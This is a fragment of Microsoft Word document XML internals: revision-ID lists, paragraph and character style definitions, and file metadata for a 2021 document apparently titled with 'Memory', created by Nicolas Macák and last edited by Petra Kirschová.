    <w:rsid w:val="00CA1B6B"/>
    <w:rsid w:val="00CA5E7D"/>
    <w:rsid w:val="00CC2942"/>
    <w:rsid w:val="00CC721C"/>
    <w:rsid w:val="00CD5BE2"/>
    <w:rsid w:val="00D00E42"/>
    <w:rsid w:val="00D109ED"/>
    <w:rsid w:val="00D257B7"/>
    <w:rsid w:val="00D31A89"/>
    <w:rsid w:val="00D712B3"/>
    <w:rsid w:val="00D73AC2"/>
    <w:rsid w:val="00D9123E"/>
    <w:rsid w:val="00DA5B11"/>
    <w:rsid w:val="00DA61AD"/>
    <w:rsid w:val="00DA733F"/>
    <w:rsid w:val="00DB1A67"/>
    <w:rsid w:val="00DB428A"/>
    <w:rsid w:val="00DB5ACA"/>
    <w:rsid w:val="00DD0822"/>
    <w:rsid w:val="00DD69E4"/>
    <w:rsid w:val="00DE4016"/>
    <w:rsid w:val="00DE7C82"/>
    <w:rsid w:val="00DF34FC"/>
    <w:rsid w:val="00E014ED"/>
    <w:rsid w:val="00E04123"/>
    <w:rsid w:val="00E15F11"/>
    <w:rsid w:val="00E25009"/>
    <w:rsid w:val="00E30AB4"/>
    <w:rsid w:val="00E339A5"/>
    <w:rsid w:val="00E36171"/>
    <w:rsid w:val="00E413D9"/>
    <w:rsid w:val="00E57C86"/>
    <w:rsid w:val="00E7204A"/>
    <w:rsid w:val="00E75AF9"/>
    <w:rsid w:val="00E83C1D"/>
    <w:rsid w:val="00E95A6C"/>
    <w:rsid w:val="00EA3621"/>
    <w:rsid w:val="00EB1961"/>
    <w:rsid w:val="00EC2A82"/>
    <w:rsid w:val="00ED3B9A"/>
    <w:rsid w:val="00ED59AF"/>
    <w:rsid w:val="00EE01DF"/>
    <w:rsid w:val="00EE1A78"/>
    <w:rsid w:val="00EE56EA"/>
    <w:rsid w:val="00EE7B00"/>
    <w:rsid w:val="00F00225"/>
    <w:rsid w:val="00F0543D"/>
    <w:rsid w:val="00F063CC"/>
    <w:rsid w:val="00F10769"/>
    <w:rsid w:val="00F10BC1"/>
    <w:rsid w:val="00F10F9D"/>
    <w:rsid w:val="00F160AA"/>
    <w:rsid w:val="00F241E9"/>
    <w:rsid w:val="00F278D8"/>
    <w:rsid w:val="00F3059C"/>
    <w:rsid w:val="00F35A22"/>
    <w:rsid w:val="00F41CD6"/>
    <w:rsid w:val="00F432D0"/>
    <w:rsid w:val="00F53EA0"/>
    <w:rsid w:val="00F55181"/>
    <w:rsid w:val="00F56622"/>
    <w:rsid w:val="00F609D3"/>
    <w:rsid w:val="00F67D1E"/>
    <w:rsid w:val="00F7282A"/>
    <w:rsid w:val="00F83038"/>
    <w:rsid w:val="00F953AC"/>
    <w:rsid w:val="00FA3184"/>
    <w:rsid w:val="00FC5833"/>
    <w:rsid w:val="00FC70D1"/>
    <w:rsid w:val="00FE0852"/>
    <w:rsid w:val="00FF2CBE"/>
    <w:rsid w:val="02999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36EE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{16100869-138D-46D2-944C-1FCB6B3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13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1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13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3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3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3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3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13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unhideWhenUsed/>
    <w:rsid w:val="0078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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00786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1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1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1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3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3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3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3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AF413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41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413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41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4135"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00AF4135"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00AF4135"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto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F41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41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3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41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41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413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413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413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1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F4135"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0078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4F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4FC"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="008E7F8B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3B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85A3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36BC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1A1A1-3B8A-4E2D-888B-6F806DED8365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E58-DE53-45E6-9750-F352D59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106</Words>
  <Characters>6806</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>23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k 3: Memory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k 3: Memory</dc:title>
  <dc:subject/>
  <dc:creator>Nicolas Macák</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Petra Kirschová</cp:lastModifiedBy>
  <cp:revision>267</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-02T21:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-15T08:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>